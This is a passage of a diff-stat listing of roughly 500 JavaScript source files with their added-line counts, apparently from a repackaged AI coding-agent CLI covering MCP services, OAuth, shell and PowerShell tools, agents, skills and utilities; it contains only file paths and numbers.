  1100. package/src/services/compact/snipProjection.js +11 -0
  1101. package/src/services/compact/timeBasedMCConfig.js +11 -0
  1102. package/src/services/contextCollapse/index.js +33 -0
  1103. package/src/services/contextCollapse/operations.js +5 -0
  1104. package/src/services/contextCollapse/persist.js +5 -0
  1105. package/src/services/diagnosticTracking.js +282 -0
  1106. package/src/services/elevenlabsTTS.js +245 -0
  1107. package/src/services/extractMemories/extractMemories.js +442 -0
  1108. package/src/services/extractMemories/prompts.js +129 -0
  1109. package/src/services/internalLogging.js +68 -0
  1110. package/src/services/lsp/LSPClient.js +306 -0
  1111. package/src/services/lsp/LSPDiagnosticRegistry.js +277 -0
  1112. package/src/services/lsp/LSPServerInstance.js +388 -0
  1113. package/src/services/lsp/LSPServerManager.js +305 -0
  1114. package/src/services/lsp/config.js +57 -0
  1115. package/src/services/lsp/manager.js +246 -0
  1116. package/src/services/lsp/passiveFeedback.js +226 -0
  1117. package/src/services/mcp/InProcessTransport.js +54 -0
  1118. package/src/services/mcp/MCPConnectionManager.js +50 -0
  1119. package/src/services/mcp/SdkControlTransport.js +115 -0
  1120. package/src/services/mcp/auth.js +1882 -0
  1121. package/src/services/mcp/channelAllowlist.js +57 -0
  1122. package/src/services/mcp/channelNotification.js +235 -0
  1123. package/src/services/mcp/channelPermissions.js +192 -0
  1124. package/src/services/mcp/claudeai.js +123 -0
  1125. package/src/services/mcp/client.js +2478 -0
  1126. package/src/services/mcp/config.js +1271 -0
  1127. package/src/services/mcp/elicitationHandler.js +192 -0
  1128. package/src/services/mcp/envExpansion.js +30 -0
  1129. package/src/services/mcp/headersHelper.js +93 -0
  1130. package/src/services/mcp/mcpStringUtils.js +85 -0
  1131. package/src/services/mcp/normalization.js +21 -0
  1132. package/src/services/mcp/oauthPort.js +69 -0
  1133. package/src/services/mcp/officialRegistry.js +20 -0
  1134. package/src/services/mcp/types.js +94 -0
  1135. package/src/services/mcp/useManageMCPConnections.js +818 -0
  1136. package/src/services/mcp/utils.js +433 -0
  1137. package/src/services/mcp/vscodeSdkMcp.js +69 -0
  1138. package/src/services/mcp/xaa.js +342 -0
  1139. package/src/services/mcp/xaaIdpLogin.js +377 -0
  1140. package/src/services/mcpServerApproval.js +30 -0
  1141. package/src/services/mockRateLimits.js +666 -0
  1142. package/src/services/notifier.js +114 -0
  1143. package/src/services/oauth/auth-code-listener.js +165 -0
  1144. package/src/services/oauth/client.js +397 -0
  1145. package/src/services/oauth/crypto.js +19 -0
  1146. package/src/services/oauth/getOauthProfile.js +48 -0
  1147. package/src/services/oauth/index.js +133 -0
  1148. package/src/services/plugins/PluginInstallationManager.js +139 -0
  1149. package/src/services/plugins/pluginCliCommands.js +230 -0
  1150. package/src/services/plugins/pluginOperations.js +826 -0
  1151. package/src/services/policyLimits/index.js +547 -0
  1152. package/src/services/policyLimits/types.js +9 -0
  1153. package/src/services/preventSleep.js +143 -0
  1154. package/src/services/rateLimitMessages.js +271 -0
  1155. package/src/services/rateLimitMocking.js +91 -0
  1156. package/src/services/remoteManagedSettings/index.js +534 -0
  1157. package/src/services/remoteManagedSettings/securityCheck.js +60 -0
  1158. package/src/services/remoteManagedSettings/syncCache.js +90 -0
  1159. package/src/services/remoteManagedSettings/syncCacheState.js +89 -0
  1160. package/src/services/remoteManagedSettings/types.js +12 -0
  1161. package/src/services/sessionTranscript/sessionTranscript.js +5 -0
  1162. package/src/services/settingsSync/index.js +478 -0
  1163. package/src/services/settingsSync/types.js +35 -0
  1164. package/src/services/skillSearch/featureCheck.js +8 -0
  1165. package/src/services/skillSearch/localSearch.js +5 -0
  1166. package/src/services/skillSearch/prefetch.js +8 -0
  1167. package/src/services/skillSearch/remoteSkillLoader.js +8 -0
  1168. package/src/services/skillSearch/remoteSkillState.js +11 -0
  1169. package/src/services/skillSearch/signals.js +3 -0
  1170. package/src/services/skillSearch/telemetry.js +8 -0
  1171. package/src/services/teamMemorySync/index.js +976 -0
  1172. package/src/services/teamMemorySync/secretScanner.js +275 -0
  1173. package/src/services/teamMemorySync/teamMemSecretGuard.js +33 -0
  1174. package/src/services/teamMemorySync/types.js +47 -0
  1175. package/src/services/teamMemorySync/watcher.js +326 -0
  1176. package/src/services/thaddeusAuth.js +485 -0
  1177. package/src/services/thaddeusAuthTypes.js +9 -0
  1178. package/src/services/thaddeusLoginFlow.js +236 -0
  1179. package/src/services/tips/tipHistory.js +17 -0
  1180. package/src/services/tips/tipRegistry.js +593 -0
  1181. package/src/services/tips/tipScheduler.js +40 -0
  1182. package/src/services/tokenEstimation.js +365 -0
  1183. package/src/services/toolUseSummary/toolUseSummaryGenerator.js +87 -0
  1184. package/src/services/tools/StreamingToolExecutor.js +413 -0
  1185. package/src/services/tools/toolExecution.js +1309 -0
  1186. package/src/services/tools/toolHooks.js +454 -0
  1187. package/src/services/tools/toolOrchestration.js +110 -0
  1188. package/src/services/vcr.js +291 -0
  1189. package/src/services/voice.js +392 -0
  1190. package/src/services/voiceKeyterms.js +94 -0
  1191. package/src/services/voiceStreamSTT.js +405 -0
  1192. package/src/setup.js +310 -0
  1193. package/src/skills/bundled/batch.js +114 -0
  1194. package/src/skills/bundled/claudeApi.js +145 -0
  1195. package/src/skills/bundled/claudeApiContent.js +71 -0
  1196. package/src/skills/bundled/claudeInChrome.js +27 -0
  1197. package/src/skills/bundled/debug.js +99 -0
  1198. package/src/skills/bundled/dream.js +49 -0
  1199. package/src/skills/bundled/emailSetup.js +196 -0
  1200. package/src/skills/bundled/hunter.js +28 -0
  1201. package/src/skills/bundled/index.js +80 -0
  1202. package/src/skills/bundled/keybindings.js +292 -0
  1203. package/src/skills/bundled/loop.js +81 -0
  1204. package/src/skills/bundled/loremIpsum.js +264 -0
  1205. package/src/skills/bundled/reactor.js +31 -0
  1206. package/src/skills/bundled/remember.js +73 -0
  1207. package/src/skills/bundled/runSkillGenerator.js +12 -0
  1208. package/src/skills/bundled/scheduleRemoteAgents.js +373 -0
  1209. package/src/skills/bundled/simplify.js +66 -0
  1210. package/src/skills/bundled/skillify.js +182 -0
  1211. package/src/skills/bundled/stuck.js +69 -0
  1212. package/src/skills/bundled/updateConfig.js +463 -0
  1213. package/src/skills/bundled/verify.js +23 -0
  1214. package/src/skills/bundled/verifyContent.js +10 -0
  1215. package/src/skills/bundledSkills.js +159 -0
  1216. package/src/skills/loadSkillsDir.js +736 -0
  1217. package/src/skills/mcpSkillBuilders.js +10 -0
  1218. package/src/skills/mcpSkills.js +5 -0
  1219. package/src/state/AppState.js +182 -0
  1220. package/src/state/AppStateStore.js +117 -0
  1221. package/src/state/onChangeAppState.js +132 -0
  1222. package/src/state/selectors.js +51 -0
  1223. package/src/state/store.js +21 -0
  1224. package/src/state/teammateViewHelpers.js +124 -0
  1225. package/src/stubs/ant-chrome-mcp/index.js +4 -0
  1226. package/src/stubs/ant-computer-use-input/index.js +2 -0
  1227. package/src/stubs/ant-computer-use-mcp/index.js +7 -0
  1228. package/src/stubs/ant-computer-use-mcp/sentinelApps.js +2 -0
  1229. package/src/stubs/ant-computer-use-mcp/types.js +3 -0
  1230. package/src/stubs/ant-computer-use-swift/index.js +1 -0
  1231. package/src/stubs/anthropic-sandbox/index.js +34 -0
  1232. package/src/tasks/DreamTask/DreamTask.js +99 -0
  1233. package/src/tasks/InProcessTeammateTask/InProcessTeammateTask.js +116 -0
  1234. package/src/tasks/InProcessTeammateTask/types.js +35 -0
  1235. package/src/tasks/LocalAgentTask/LocalAgentTask.js +507 -0
  1236. package/src/tasks/LocalMainSessionTask.js +338 -0
  1237. package/src/tasks/LocalShellTask/LocalShellTask.js +475 -0
  1238. package/src/tasks/LocalShellTask/guards.js +9 -0
  1239. package/src/tasks/LocalShellTask/killShellTasks.js +59 -0
  1240. package/src/tasks/LocalWorkflowTask/LocalWorkflowTask.js +7 -0
  1241. package/src/tasks/MonitorMcpTask/MonitorMcpTask.js +20 -0
  1242. package/src/tasks/RemoteAgentTask/RemoteAgentTask.js +742 -0
  1243. package/src/tasks/pillLabel.js +69 -0
  1244. package/src/tasks/stopTask.js +67 -0
  1245. package/src/tasks/types.js +18 -0
  1246. package/src/tasks.js +37 -0
  1247. package/src/tools/AIEmployeesTool/AIEmployeesTool.js +674 -0
  1248. package/src/tools/AIEmployeesTool/constants.js +1 -0
  1249. package/src/tools/AIEmployeesTool/prompt.js +56 -0
  1250. package/src/tools/AgentTool/AgentTool.js +1221 -0
  1251. package/src/tools/AgentTool/UI.js +593 -0
  1252. package/src/tools/AgentTool/agentColorManager.js +43 -0
  1253. package/src/tools/AgentTool/agentDisplay.js +72 -0
  1254. package/src/tools/AgentTool/agentMemory.js +125 -0
  1255. package/src/tools/AgentTool/agentMemorySnapshot.js +136 -0
  1256. package/src/tools/AgentTool/agentToolUtils.js +456 -0
  1257. package/src/tools/AgentTool/built-in/exploreAgent.js +76 -0
  1258. package/src/tools/AgentTool/built-in/generalPurposeAgent.js +28 -0
  1259. package/src/tools/AgentTool/built-in/planAgent.js +87 -0
  1260. package/src/tools/AgentTool/built-in/statuslineSetup.js +140 -0
  1261. package/src/tools/AgentTool/built-in/thaddeusGuideAgent.js +174 -0
  1262. package/src/tools/AgentTool/built-in/verificationAgent.js +146 -0
  1263. package/src/tools/AgentTool/builtInAgents.js +56 -0
  1264. package/src/tools/AgentTool/constants.js +11 -0
  1265. package/src/tools/AgentTool/forkSubagent.js +177 -0
  1266. package/src/tools/AgentTool/loadAgentsDir.js +497 -0
  1267. package/src/tools/AgentTool/prompt.js +260 -0
  1268. package/src/tools/AgentTool/resumeAgent.js +182 -0
  1269. package/src/tools/AgentTool/runAgent.js +627 -0
  1270. package/src/tools/AppointmentsTool/AppointmentsTool.js +628 -0
  1271. package/src/tools/AppointmentsTool/constants.js +1 -0
  1272. package/src/tools/AppointmentsTool/prompt.js +15 -0
  1273. package/src/tools/AskUserQuestionTool/AskUserQuestionTool.js +238 -0
  1274. package/src/tools/AskUserQuestionTool/prompt.js +38 -0
  1275. package/src/tools/BashTool/BashTool.js +1009 -0
  1276. package/src/tools/BashTool/BashToolResultMessage.js +169 -0
  1277. package/src/tools/BashTool/UI.js +134 -0
  1278. package/src/tools/BashTool/bashCommandHelpers.js +184 -0
  1279. package/src/tools/BashTool/bashPermissions.js +2023 -0
  1280. package/src/tools/BashTool/bashSecurity.js +2267 -0
  1281. package/src/tools/BashTool/commandSemantics.js +105 -0
  1282. package/src/tools/BashTool/commentLabel.js +14 -0
  1283. package/src/tools/BashTool/destructiveCommandWarning.js +88 -0
  1284. package/src/tools/BashTool/modeValidation.js +86 -0
  1285. package/src/tools/BashTool/pathValidation.js +1079 -0
  1286. package/src/tools/BashTool/prompt.js +333 -0
  1287. package/src/tools/BashTool/readOnlyValidation.js +1794 -0
  1288. package/src/tools/BashTool/sedEditParser.js +282 -0
  1289. package/src/tools/BashTool/sedValidation.js +580 -0
  1290. package/src/tools/BashTool/shouldUseSandbox.js +125 -0
  1291. package/src/tools/BashTool/toolName.js +2 -0
  1292. package/src/tools/BashTool/utils.js +180 -0
  1293. package/src/tools/BriefTool/BriefTool.js +173 -0
  1294. package/src/tools/BriefTool/UI.js +67 -0
  1295. package/src/tools/BriefTool/attachments.js +86 -0
  1296. package/src/tools/BriefTool/prompt.js +19 -0
  1297. package/src/tools/BriefTool/upload.js +136 -0
  1298. package/src/tools/CalendarTool/CalendarTool.js +498 -0
  1299. package/src/tools/CalendarTool/constants.js +1 -0
  1300. package/src/tools/CalendarTool/prompt.js +11 -0
  1301. package/src/tools/ConfigTool/ConfigTool.js +398 -0
  1302. package/src/tools/ConfigTool/UI.js +25 -0
  1303. package/src/tools/ConfigTool/constants.js +1 -0
  1304. package/src/tools/ConfigTool/prompt.js +82 -0
  1305. package/src/tools/ConfigTool/supportedSettings.js +180 -0
  1306. package/src/tools/ContactsTool/ContactsTool.js +648 -0
  1307. package/src/tools/ContactsTool/constants.js +1 -0
  1308. package/src/tools/ContactsTool/prompt.js +15 -0
  1309. package/src/tools/CtxInspectTool/CtxInspectTool.js +44 -0
  1310. package/src/tools/DiscoverSkillsTool/prompt.js +4 -0
  1311. package/src/tools/EmailReadTool/index.js +410 -0
  1312. package/src/tools/EmailSendTool/index.js +178 -0
  1313. package/src/tools/EnterPlanModeTool/EnterPlanModeTool.js +98 -0
  1314. package/src/tools/EnterPlanModeTool/UI.js +14 -0
  1315. package/src/tools/EnterPlanModeTool/constants.js +1 -0
  1316. package/src/tools/EnterPlanModeTool/prompt.js +164 -0
  1317. package/src/tools/EnterWorktreeTool/EnterWorktreeTool.js +104 -0
  1318. package/src/tools/EnterWorktreeTool/UI.js +9 -0
  1319. package/src/tools/EnterWorktreeTool/constants.js +1 -0
  1320. package/src/tools/EnterWorktreeTool/prompt.js +30 -0
  1321. package/src/tools/ExitPlanModeTool/ExitPlanModeV2Tool.js +383 -0
  1322. package/src/tools/ExitPlanModeTool/UI.js +32 -0
  1323. package/src/tools/ExitPlanModeTool/constants.js +2 -0
  1324. package/src/tools/ExitPlanModeTool/prompt.js +27 -0
  1325. package/src/tools/ExitWorktreeTool/ExitWorktreeTool.js +257 -0
  1326. package/src/tools/ExitWorktreeTool/UI.js +10 -0
  1327. package/src/tools/ExitWorktreeTool/constants.js +1 -0
  1328. package/src/tools/ExitWorktreeTool/prompt.js +32 -0
  1329. package/src/tools/FileEditTool/FileEditTool.js +480 -0
  1330. package/src/tools/FileEditTool/UI.js +202 -0
  1331. package/src/tools/FileEditTool/constants.js +7 -0
  1332. package/src/tools/FileEditTool/prompt.js +24 -0
  1333. package/src/tools/FileEditTool/types.js +50 -0
  1334. package/src/tools/FileEditTool/utils.js +579 -0
  1335. package/src/tools/FileReadTool/FileReadTool.js +889 -0
  1336. package/src/tools/FileReadTool/UI.js +126 -0
  1337. package/src/tools/FileReadTool/imageProcessor.js +46 -0
  1338. package/src/tools/FileReadTool/limits.js +70 -0
  1339. package/src/tools/FileReadTool/prompt.js +31 -0
  1340. package/src/tools/FileWriteTool/FileWriteTool.js +341 -0
  1341. package/src/tools/FileWriteTool/UI.js +339 -0
  1342. package/src/tools/FileWriteTool/prompt.js +15 -0
  1343. package/src/tools/GlobTool/GlobTool.js +161 -0
  1344. package/src/tools/GlobTool/UI.js +40 -0
  1345. package/src/tools/GlobTool/prompt.js +6 -0
  1346. package/src/tools/GrepTool/GrepTool.js +439 -0
  1347. package/src/tools/GrepTool/UI.js +155 -0
  1348. package/src/tools/GrepTool/prompt.js +16 -0
  1349. package/src/tools/IntegrationsTool/IntegrationsTool.js +217 -0
  1350. package/src/tools/IntegrationsTool/constants.js +1 -0
  1351. package/src/tools/IntegrationsTool/prompt.js +41 -0
  1352. package/src/tools/InteractionsTool/InteractionsTool.js +525 -0
  1353. package/src/tools/InteractionsTool/constants.js +1 -0
  1354. package/src/tools/InteractionsTool/prompt.js +14 -0
  1355. package/src/tools/InvoicesTool/InvoicesTool.js +581 -0
  1356. package/src/tools/InvoicesTool/constants.js +1 -0
  1357. package/src/tools/InvoicesTool/prompt.js +15 -0
  1358. package/src/tools/LSPTool/LSPTool.js +660 -0
  1359. package/src/tools/LSPTool/UI.js +205 -0
  1360. package/src/tools/LSPTool/formatters.js +445 -0
  1361. package/src/tools/LSPTool/prompt.js +20 -0
  1362. package/src/tools/LSPTool/schemas.js +197 -0
  1363. package/src/tools/LSPTool/symbolContext.js +75 -0
  1364. package/src/tools/LeadScorerTool/LeadScorerTool.js +509 -0
  1365. package/src/tools/LeadScorerTool/constants.js +1 -0
  1366. package/src/tools/LeadScorerTool/prompt.js +11 -0
  1367. package/src/tools/ListMcpResourcesTool/ListMcpResourcesTool.js +100 -0
  1368. package/src/tools/ListMcpResourcesTool/UI.js +17 -0
  1369. package/src/tools/ListMcpResourcesTool/prompt.js +18 -0
  1370. package/src/tools/ListPeersTool/ListPeersTool.js +45 -0
  1371. package/src/tools/MCPTool/MCPTool.js +60 -0
  1372. package/src/tools/MCPTool/UI.js +343 -0
  1373. package/src/tools/MCPTool/classifyForCollapse.js +597 -0
  1374. package/src/tools/MCPTool/prompt.js +3 -0
  1375. package/src/tools/McpAuthTool/McpAuthTool.js +162 -0
  1376. package/src/tools/MonitorTool/MonitorTool.js +55 -0
  1377. package/src/tools/NotebookEditTool/NotebookEditTool.js +421 -0
  1378. package/src/tools/NotebookEditTool/UI.js +41 -0
  1379. package/src/tools/NotebookEditTool/constants.js +2 -0
  1380. package/src/tools/NotebookEditTool/prompt.js +2 -0
  1381. package/src/tools/OverflowTestTool/OverflowTestTool.js +51 -0
  1382. package/src/tools/PhoneBridgeTool/PhoneBridgeTool.js +301 -0
  1383. package/src/tools/PhoneBridgeTool/constants.js +1 -0
  1384. package/src/tools/PhoneBridgeTool/prompt.js +26 -0
  1385. package/src/tools/PowerShellTool/PowerShellTool.js +900 -0
  1386. package/src/tools/PowerShellTool/UI.js +58 -0
  1387. package/src/tools/PowerShellTool/clmTypes.js +207 -0
  1388. package/src/tools/PowerShellTool/commandSemantics.js +115 -0
  1389. package/src/tools/PowerShellTool/commonParameters.js +27 -0
  1390. package/src/tools/PowerShellTool/destructiveCommandWarning.js +92 -0
  1391. package/src/tools/PowerShellTool/gitSafety.js +185 -0
  1392. package/src/tools/PowerShellTool/modeValidation.js +357 -0
  1393. package/src/tools/PowerShellTool/pathValidation.js +1712 -0
  1394. package/src/tools/PowerShellTool/powershellPermissions.js +1351 -0
  1395. package/src/tools/PowerShellTool/powershellSecurity.js +942 -0
  1396. package/src/tools/PowerShellTool/prompt.js +132 -0
  1397. package/src/tools/PowerShellTool/readOnlyValidation.js +1633 -0
  1398. package/src/tools/PowerShellTool/toolName.js +2 -0
  1399. package/src/tools/PushNotificationTool/PushNotificationTool.js +35 -0
  1400. package/src/tools/REPLTool/REPLTool.js +44 -0
  1401. package/src/tools/REPLTool/constants.js +43 -0
  1402. package/src/tools/REPLTool/primitiveTools.js +36 -0
  1403. package/src/tools/ReadMcpResourceTool/ReadMcpResourceTool.js +112 -0
  1404. package/src/tools/ReadMcpResourceTool/UI.js +24 -0
  1405. package/src/tools/ReadMcpResourceTool/prompt.js +15 -0
  1406. package/src/tools/RemoteTriggerTool/RemoteTriggerTool.js +142 -0
  1407. package/src/tools/RemoteTriggerTool/UI.js +12 -0
  1408. package/src/tools/RemoteTriggerTool/prompt.js +12 -0
  1409. package/src/tools/ReviewArtifactTool/ReviewArtifactTool.js +51 -0
  1410. package/src/tools/ScheduleCronTool/CronCreateTool.js +120 -0
  1411. package/src/tools/ScheduleCronTool/CronDeleteTool.js +74 -0
  1412. package/src/tools/ScheduleCronTool/CronListTool.js +77 -0
  1413. package/src/tools/ScheduleCronTool/UI.js +29 -0
  1414. package/src/tools/ScheduleCronTool/prompt.js +115 -0
  1415. package/src/tools/SendMessageTool/SendMessageTool.js +673 -0
  1416. package/src/tools/SendMessageTool/UI.js +24 -0
  1417. package/src/tools/SendMessageTool/constants.js +1 -0
  1418. package/src/tools/SendMessageTool/prompt.js +47 -0
  1419. package/src/tools/SendUserFileTool/SendUserFileTool.js +35 -0
  1420. package/src/tools/SendUserFileTool/prompt.js +5 -0
  1421. package/src/tools/SkillTool/SkillTool.js +825 -0
  1422. package/src/tools/SkillTool/UI.js +61 -0
  1423. package/src/tools/SkillTool/constants.js +1 -0
  1424. package/src/tools/SkillTool/prompt.js +184 -0
  1425. package/src/tools/SleepTool/SleepTool.js +42 -0
  1426. package/src/tools/SleepTool/prompt.js +14 -0
  1427. package/src/tools/SnipTool/SnipTool.js +47 -0
  1428. package/src/tools/SnipTool/prompt.js +5 -0
  1429. package/src/tools/SubscribePRTool/SubscribePRTool.js +49 -0
  1430. package/src/tools/SuggestBackgroundPRTool/SuggestBackgroundPRTool.js +44 -0
  1431. package/src/tools/SyntheticOutputTool/SyntheticOutputTool.js +138 -0
  1432. package/src/tools/SyntheticOutputTool/SyntheticOutputTool.ts +1 -1
  1433. package/src/tools/TaskCreateTool/TaskCreateTool.js +104 -0
  1434. package/src/tools/TaskCreateTool/constants.js +1 -0
  1435. package/src/tools/TaskCreateTool/prompt.js +52 -0
  1436. package/src/tools/TaskGetTool/TaskGetTool.js +106 -0
  1437. package/src/tools/TaskGetTool/constants.js +1 -0
  1438. package/src/tools/TaskGetTool/prompt.js +23 -0
  1439. package/src/tools/TaskListTool/TaskListTool.js +89 -0
  1440. package/src/tools/TaskListTool/constants.js +1 -0
  1441. package/src/tools/TaskListTool/prompt.js +44 -0
  1442. package/src/tools/TaskOutputTool/TaskOutputTool.js +536 -0
  1443. package/src/tools/TaskOutputTool/constants.js +1 -0
  1444. package/src/tools/TaskStopTool/TaskStopTool.js +110 -0
  1445. package/src/tools/TaskStopTool/UI.js +31 -0
  1446. package/src/tools/TaskStopTool/prompt.js +7 -0
  1447. package/src/tools/TaskUpdateTool/TaskUpdateTool.js +301 -0
  1448. package/src/tools/TaskUpdateTool/constants.js +1 -0
  1449. package/src/tools/TaskUpdateTool/prompt.js +76 -0
  1450. package/src/tools/TeamCreateTool/TeamCreateTool.js +177 -0
  1451. package/src/tools/TeamCreateTool/UI.js +4 -0
  1452. package/src/tools/TeamCreateTool/constants.js +1 -0
  1453. package/src/tools/TeamCreateTool/prompt.js +113 -0
  1454. package/src/tools/TeamDeleteTool/TeamDeleteTool.js +102 -0
  1455. package/src/tools/TeamDeleteTool/UI.js +13 -0
  1456. package/src/tools/TeamDeleteTool/constants.js +1 -0
  1457. package/src/tools/TeamDeleteTool/prompt.js +16 -0
  1458. package/src/tools/TerminalCaptureTool/TerminalCaptureTool.js +47 -0
  1459. package/src/tools/TerminalCaptureTool/prompt.js +11 -0
  1460. package/src/tools/TodoWriteTool/TodoWriteTool.js +99 -0
  1461. package/src/tools/TodoWriteTool/constants.js +1 -0
  1462. package/src/tools/TodoWriteTool/prompt.js +181 -0
  1463. package/src/tools/ToolSearchTool/ToolSearchTool.js +357 -0
  1464. package/src/tools/ToolSearchTool/constants.js +1 -0
  1465. package/src/tools/ToolSearchTool/prompt.js +97 -0
  1466. package/src/tools/TungstenTool/TungstenLiveMonitor.js +7 -0
  1467. package/src/tools/TungstenTool/TungstenTool.js +3 -0
  1468. package/src/tools/VerifyPlanExecutionTool/VerifyPlanExecutionTool.js +45 -0
  1469. package/src/tools/VerifyPlanExecutionTool/constants.js +2 -0
  1470. package/src/tools/WebBrowserTool/WebBrowserPanel.js +5 -0
  1471. package/src/tools/WebBrowserTool/WebBrowserTool.js +58 -0
  1472. package/src/tools/WebFetchTool/UI.js +31 -0
  1473. package/src/tools/WebFetchTool/WebFetchTool.js +246 -0
  1474. package/src/tools/WebFetchTool/preapproved.js +154 -0
  1475. package/src/tools/WebFetchTool/prompt.js +39 -0
  1476. package/src/tools/WebFetchTool/utils.js +368 -0
  1477. package/src/tools/WebSearchTool/UI.js +67 -0
  1478. package/src/tools/WebSearchTool/WebSearchTool.js +396 -0
  1479. package/src/tools/WebSearchTool/prompt.js +32 -0
  1480. package/src/tools/WorkflowTool/WorkflowPermissionRequest.js +7 -0
  1481. package/src/tools/WorkflowTool/WorkflowTool.js +51 -0
  1482. package/src/tools/WorkflowTool/bundled/index.js +5 -0
  1483. package/src/tools/WorkflowTool/constants.js +1 -0
  1484. package/src/tools/WorkflowTool/createWorkflowCommand.js +5 -0
  1485. package/src/tools/shared/gitOperationTracking.js +220 -0
  1486. package/src/tools/shared/spawnMultiAgent.js +805 -0
  1487. package/src/tools/testing/TestingPermissionTool.js +72 -0
  1488. package/src/tools/utils.js +24 -0
  1489. package/src/tools.js +365 -0
  1490. package/src/types/command.js +8 -0
  1491. package/src/types/connectorText.js +3 -0
  1492. package/src/types/generated/events_mono/claude_code/v1/claude_code_internal_event.js +673 -0
  1493. package/src/types/generated/events_mono/common/v1/auth.js +49 -0
  1494. package/src/types/generated/events_mono/growthbook/v1/growthbook_experiment_event.js +147 -0
  1495. package/src/types/generated/google/protobuf/timestamp.js +38 -0
  1496. package/src/types/hooks.js +153 -0
  1497. package/src/types/ids.js +27 -0
  1498. package/src/types/logs.js +11 -0
  1499. package/src/types/permissions.js +25 -0
  1500. package/src/types/plugin.js +72 -0
  1501. package/src/types/textInputTypes.js +20 -0
  1502. package/src/upstreamproxy/relay.js +346 -0
  1503. package/src/upstreamproxy/upstreamproxy.js +234 -0
  1504. package/src/utils/CircularBuffer.js +75 -0
  1505. package/src/utils/Cursor.js +1229 -0
  1506. package/src/utils/QueryGuard.js +115 -0
  1507. package/src/utils/Shell.js +374 -0
  1508. package/src/utils/ShellCommand.js +336 -0
  1509. package/src/utils/abortController.js +74 -0
  1510. package/src/utils/activityManager.js +127 -0
  1511. package/src/utils/advisor.js +77 -0
  1512. package/src/utils/agentContext.js +91 -0
  1513. package/src/utils/agentId.js +83 -0
  1514. package/src/utils/agentSwarmsEnabled.js +37 -0
  1515. package/src/utils/agenticSessionSearch.js +255 -0
  1516. package/src/utils/analyzeContext.js +846 -0
  1517. package/src/utils/ansiToPng.js +259 -0
  1518. package/src/utils/ansiToSvg.js +207 -0
  1519. package/src/utils/api.js +555 -0
  1520. package/src/utils/apiPreconnect.js +62 -0
  1521. package/src/utils/appleTerminalBackup.js +95 -0
  1522. package/src/utils/argumentSubstitution.js +114 -0
  1523. package/src/utils/array.js +12 -0
  1524. package/src/utils/asciicast.js +200 -0
  1525. package/src/utils/attachments.js +2518 -0
  1526. package/src/utils/attribution.js +308 -0
  1527. package/src/utils/auth.js +1598 -0
  1528. package/src/utils/authFileDescriptor.js +152 -0
  1529. package/src/utils/authPortable.js +14 -0
  1530. package/src/utils/autoModeDenials.js +15 -0
  1531. package/src/utils/autoRunIssue.js +113 -0
  1532. package/src/utils/autoUpdater.js +457 -0
  1533. package/src/utils/aws.js +44 -0
  1534. package/src/utils/awsAuthStatusManager.js +66 -0
  1535. package/src/utils/background/remote/preconditions.js +175 -0
  1536. package/src/utils/background/remote/remoteSession.js +53 -0
  1537. package/src/utils/backgroundHousekeeping.js +64 -0
  1538. package/src/utils/bash/ParsedCommand.js +241 -0
  1539. package/src/utils/bash/ShellSnapshot.js +489 -0
  1540. package/src/utils/bash/ast.js +2590 -0
  1541. package/src/utils/bash/bashParser.js +4355 -0
  1542. package/src/utils/bash/bashPipeCommand.js +249 -0
  1543. package/src/utils/bash/commands.js +1131 -0
  1544. package/src/utils/bash/heredoc.js +647 -0
  1545. package/src/utils/bash/parser.js +195 -0
  1546. package/src/utils/bash/prefix.js +154 -0
  1547. package/src/utils/bash/registry.js +23 -0
  1548. package/src/utils/bash/shellCompletion.js +196 -0
  1549. package/src/utils/bash/shellPrefix.js +25 -0
  1550. package/src/utils/bash/shellQuote.js +253 -0
  1551. package/src/utils/bash/shellQuoting.js +106 -0
  1552. package/src/utils/bash/specs/alias.js +11 -0
  1553. package/src/utils/bash/specs/index.js +16 -0
  1554. package/src/utils/bash/specs/nohup.js +10 -0
  1555. package/src/utils/bash/specs/pyright.js +88 -0
  1556. package/src/utils/bash/specs/sleep.js +10 -0
  1557. package/src/utils/bash/specs/srun.js +28 -0
  1558. package/src/utils/bash/specs/time.js +10 -0
  1559. package/src/utils/bash/specs/timeout.js +17 -0
  1560. package/src/utils/bash/treeSitterAnalysis.js +407 -0
  1561. package/src/utils/betas.js +331 -0
  1562. package/src/utils/billing.js +54 -0
  1563. package/src/utils/binaryCheck.js +40 -0
  1564. package/src/utils/browser.js +58 -0
  1565. package/src/utils/bufferedWriter.js +77 -0
  1566. package/src/utils/bundledMode.js +19 -0
  1567. package/src/utils/businessDb.js +390 -0
  1568. package/src/utils/caCerts.js +91 -0
  1569. package/src/utils/caCertsConfig.js +77 -0
  1570. package/src/utils/cachePaths.js +28 -0
  1571. package/src/utils/classifierApprovals.js +66 -0
  1572. package/src/utils/classifierApprovalsHook.js +10 -0
  1573. package/src/utils/claudeDesktop.js +108 -0
  1574. package/src/utils/claudeInChrome/chromeNativeHost.js +416 -0
  1575. package/src/utils/claudeInChrome/common.js +466 -0
  1576. package/src/utils/claudeInChrome/mcpServer.js +237 -0
  1577. package/src/utils/claudeInChrome/prompt.js +79 -0
  1578. package/src/utils/claudeInChrome/setup.js +304 -0
  1579. package/src/utils/claudeInChrome/setupPortable.js +172 -0
  1580. package/src/utils/claudeInChrome/toolRendering.js +235 -0
  1581. package/src/utils/claudemd.js +1052 -0
  1582. package/src/utils/cleanup.js +514 -0
  1583. package/src/utils/cleanupRegistry.js +22 -0
  1584. package/src/utils/cliArgs.js +53 -0
  1585. package/src/utils/cliHighlight.js +45 -0
  1586. package/src/utils/codeIndexing.js +149 -0
  1587. package/src/utils/collapseBackgroundBashNotifications.js +70 -0
  1588. package/src/utils/collapseHookSummaries.js +48 -0
  1589. package/src/utils/collapseReadSearch.js +869 -0
  1590. package/src/utils/collapseTeammateShutdowns.js +44 -0
  1591. package/src/utils/combinedAbortSignal.js +40 -0
  1592. package/src/utils/commandLifecycle.js +7 -0
  1593. package/src/utils/commitAttribution.js +718 -0
  1594. package/src/utils/completionCache.js +138 -0
  1595. package/src/utils/computerUse/appNames.js +170 -0
  1596. package/src/utils/computerUse/cleanup.js +65 -0
  1597. package/src/utils/computerUse/common.js +56 -0
  1598. package/src/utils/computerUse/computerUseLock.js +183 -0
  1599. package/src/utils/computerUse/drainRunLoop.js +71 -0
  1600. package/src/utils/computerUse/escHotkey.js +53 -0
  1601. package/src/utils/computerUse/executor.js +480 -0
  1602. package/src/utils/computerUse/gates.js +55 -0
  1603. package/src/utils/computerUse/hostAdapter.js +62 -0
  1604. package/src/utils/computerUse/inputLoader.js +25 -0
  1605. package/src/utils/computerUse/mcpServer.js +84 -0
  1606. package/src/utils/computerUse/setup.js +42 -0
  1607. package/src/utils/computerUse/swiftLoader.js +18 -0
  1608. package/src/utils/computerUse/toolRendering.js +101 -0
